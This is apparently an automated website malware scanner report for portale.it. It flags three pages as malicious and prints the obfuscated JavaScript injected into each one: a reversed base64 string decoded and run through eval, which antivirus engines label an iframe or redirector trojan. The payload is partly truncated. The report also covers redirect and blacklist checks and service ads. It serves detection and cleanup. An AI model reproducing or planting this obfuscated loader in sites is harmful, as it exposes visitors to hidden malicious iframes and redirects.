Malware Scanner report for portale.it

Malicious/Suspicious/Total urls checked: 3/0/15

3 pages have malicious code. See details below

Blacklists: OK

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/3

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Scanned pages/files

Request	Server response	Status
http://www.portale.it/	200 OK Content-Length: 25580 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var _0OI='=sTKpUGchN2cl9FKlBXYjNXZuVHKlRXaydnL05WZtV3YvR2OpADbshCZslGaDRmblBHch5yTP9kC70FMblyJkFWZodCKl1WYOdWYUlnQzRnbl1WZsVEdldmL05WZtV3YvRGI9AyTP9EIyFmdKsTKMJVVuQnbl1Wdj9GZoQnbl52bw12bDlkUVVGZvNmbltyJ9wmc1ZyJrkiclJnclZWZy5CduVWb1N2bkhCduVmbvBXbvNUSSVVZk92YuV2Kn0jZlJnJnsyJr9WPjJ3c0V2Z/8SbvNmLy9GdhN2c1ZmYvxWb0hmLpBXYv8iOwRHdodCI9AyYyNnLwwGbKsTKnQHcpJ3YzdCK05WZtVGbFVGdhVmcj5CduVWb1N2bkBSPgADbsBichZ3OnU0MlQHcpJ3Yz9yQzUSQwUiQzUSOyUCOyUyckFEajRXZGVGbn92bn9VQHFEMlU0MlcjMlQHcpJ3YzFmdhp2L0hXZ0djMlQ0MlU ... 389 bytes are skipped ...(i++));h4=O10lOI[_0x84de[3]](data[_0x84de[2]](i++));bits=h1<<18\|h2<<12\|h3<<6\|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String[_0x84de[4]](o1);} else {if(h4==64){enc+=String[_0x84de[4]](o1,o2);} else {enc+=String[_0x84de[4]](o1,o2,o3);} ;} ;} while(i<data[_0x84de[5]]);;return enc;} ;function O10(string){var ret=_0x84de[1],i=0;for(i=string[_0x84de[5]]-1;i>=0;i--){ret+=string[_0x84de[2]](i);} ;return ret;} ;eval(OIO(O10(_0OI))); Antivirus reports: Ikarus Trojan.Script K7AntiVirus Riskware Fortinet JS/IFrame.DBV!tr NANO-Antivirus Trojan.Script.Redirector.bqiube F-Prot JS/IFrame.SJ.gen AVG HTML/Framer Norman Crypt.BJLS Commtouch JS/IFrame.SJ.gen
http://www.portale.it/js/html5.js	200 OK Content-Length: 283 Content-Type: text/javascript	clean
http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js	200 OK Content-Length: 72174 Content-Type: text/javascript	clean
http://pagead2.googlesyndication.com/pagead/show_ads.js	200 OK Content-Length: 19470 Content-Type: text/javascript	clean
http://partner.googleadservices.com/gampad/google_service.js	200 OK Content-Length: 3799 Content-Type: text/javascript	clean
http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js	200 OK Content-Length: 57254 Content-Type: text/javascript	clean
http://ajax.googleapis.com/ajax/libs/jqueryui/1.5.3/jquery-ui.min.js	200 OK Content-Length: 183557 Content-Type: text/javascript	clean
http://www.al-habib.info/ical-js/jsphp.php	200 OK Content-Length: 47 Content-Type: application/x-javascript	clean
http://ajax.googleapis.com/ajax/libs/jquery/1.8.2/jquery.min.js	200 OK Content-Length: 93435 Content-Type: text/javascript	clean
http://www.portale.it/index.php	200 OK Content-Length: 25580 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var _0OI='=sTKpUGchN2cl9FKlBXYjNXZuVHKlRXaydnL05WZtV3YvR2OpADbshCZslGaDRmblBHch5yTP9kC70FMblyJkFWZodCKl1WYOdWYUlnQzRnbl1WZsVEdldmL05WZtV3YvRGI9AyTP9EIyFmdKsTKMJVVuQnbl1Wdj9GZoQnbl52bw12bDlkUVVGZvNmbltyJ9wmc1ZyJrkiclJnclZWZy5CduVWb1N2bkhCduVmbvBXbvNUSSVVZk92YuV2Kn0jZlJnJnsyJr9WPjJ3c0V2Z/8SbvNmLy9GdhN2c1ZmYvxWb0hmLpBXYv8iOwRHdodCI9AyYyNnLwwGbKsTKnQHcpJ3YzdCK05WZtVGbFVGdhVmcj5CduVWb1N2bkBSPgADbsBichZ3OnU0MlQHcpJ3Yz9yQzUSQwUiQzUSOyUCOyUyckFEajRXZGVGbn92bn9VQHFEMlU0MlcjMlQHcpJ3YzFmdhp2L0hXZ0djMlQ0MlU ... 389 bytes are skipped ...(i++));h4=O10lOI[_0x84de[3]](data[_0x84de[2]](i++));bits=h1<<18\|h2<<12\|h3<<6\|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String[_0x84de[4]](o1);} else {if(h4==64){enc+=String[_0x84de[4]](o1,o2);} else {enc+=String[_0x84de[4]](o1,o2,o3);} ;} ;} while(i<data[_0x84de[5]]);;return enc;} ;function O10(string){var ret=_0x84de[1],i=0;for(i=string[_0x84de[5]]-1;i>=0;i--){ret+=string[_0x84de[2]](i);} ;return ret;} ;eval(OIO(O10(_0OI))); Antivirus reports: Ikarus Trojan.Script K7AntiVirus Riskware Fortinet JS/IFrame.DBV!tr NANO-Antivirus Trojan.Script.Redirector.bqiube F-Prot JS/IFrame.SJ.gen AVG HTML/Framer Norman Crypt.BJLS Commtouch JS/IFrame.SJ.gen
http://www.portale.it/economia.php	200 OK Content-Length: 26268 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var _0OI='=sTKpUGchN2cl9FKlBXYjNXZuVHKlRXaydnL05WZtV3YvR2OpADbshCZslGaDRmblBHch5yTP9kC70FMblyJkFWZodCKl1WYOdWYUlnQzRnbl1WZsVEdldmL05WZtV3YvRGI9AyTP9EIyFmdKsTKMJVVuQnbl1Wdj9GZoQnbl52bw12bDlkUVVGZvNmbltyJ9wmc1ZyJrkiclJnclZWZy5CduVWb1N2bkhCduVmbvBXbvNUSSVVZk92YuV2Kn0jZlJnJnsyJr9WPjJ3c0V2Z/8SbvNmLy9GdhN2c1ZmYvxWb0hmLpBXYv8iOwRHdodCI9AyYyNnLwwGbKsTKnQHcpJ3YzdCK05WZtVGbFVGdhVmcj5CduVWb1N2bkBSPgADbsBichZ3OnU0MlQHcpJ3Yz9yQzUSQwUiQzUSOyUCOyUyckFEajRXZGVGbn92bn9VQHFEMlU0MlcjMlQHcpJ3YzFmdhp2L0hXZ0djMlQ0MlU ... 389 bytes are skipped ...(i++));h4=O10lOI[_0x84de[3]](data[_0x84de[2]](i++));bits=h1<<18\|h2<<12\|h3<<6\|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String[_0x84de[4]](o1);} else {if(h4==64){enc+=String[_0x84de[4]](o1,o2);} else {enc+=String[_0x84de[4]](o1,o2,o3);} ;} ;} while(i<data[_0x84de[5]]);;return enc;} ;function O10(string){var ret=_0x84de[1],i=0;for(i=string[_0x84de[5]]-1;i>=0;i--){ret+=string[_0x84de[2]](i);} ;return ret;} ;eval(OIO(O10(_0OI))); Antivirus reports: Ikarus Trojan.Script K7AntiVirus Riskware Fortinet JS/IFrame.DBV!tr NANO-Antivirus Trojan.Script.Redirector.bqiube F-Prot JS/IFrame.SJ.gen AVG HTML/Framer Norman Crypt.BJLS Commtouch JS/IFrame.SJ.gen
http://startbyzero.com/static/finance/stock/widget.js	500 timeout Content-Length: 30 Content-Type: text/plain	clean
http://startbyzero.com/test404page.js	500 Can't connect to startbyzero.com:80 Content-Length: 190 Content-Type: text/plain	clean
http://www.oil-price.net/syndicate_usd.php?lang=it	200 OK Content-Length: 2713 Content-Type: text/html	clean
http://www.oil-price.net/\"http://www.oil-price.net/dashboard.php?lang=it	404 Not Found Content-Length: 327 Content-Type: text/html	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: portale.it

Result:

Second query (visit from search engine):
GET / HTTP/1.1
Host: portale.it
Referer: http://www.google.com/search?q=portale.it

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=portale.it

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://portale.it/

Result: portale.it is not infected or malware details are not published yet.

Recently found suspicious websites

Malware Scanner report for portale.it

Malware & Hack Repair

Website Hack Insurance

Scanned pages/files

Malicious Redirects

Safe Browsing / Blacklists

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools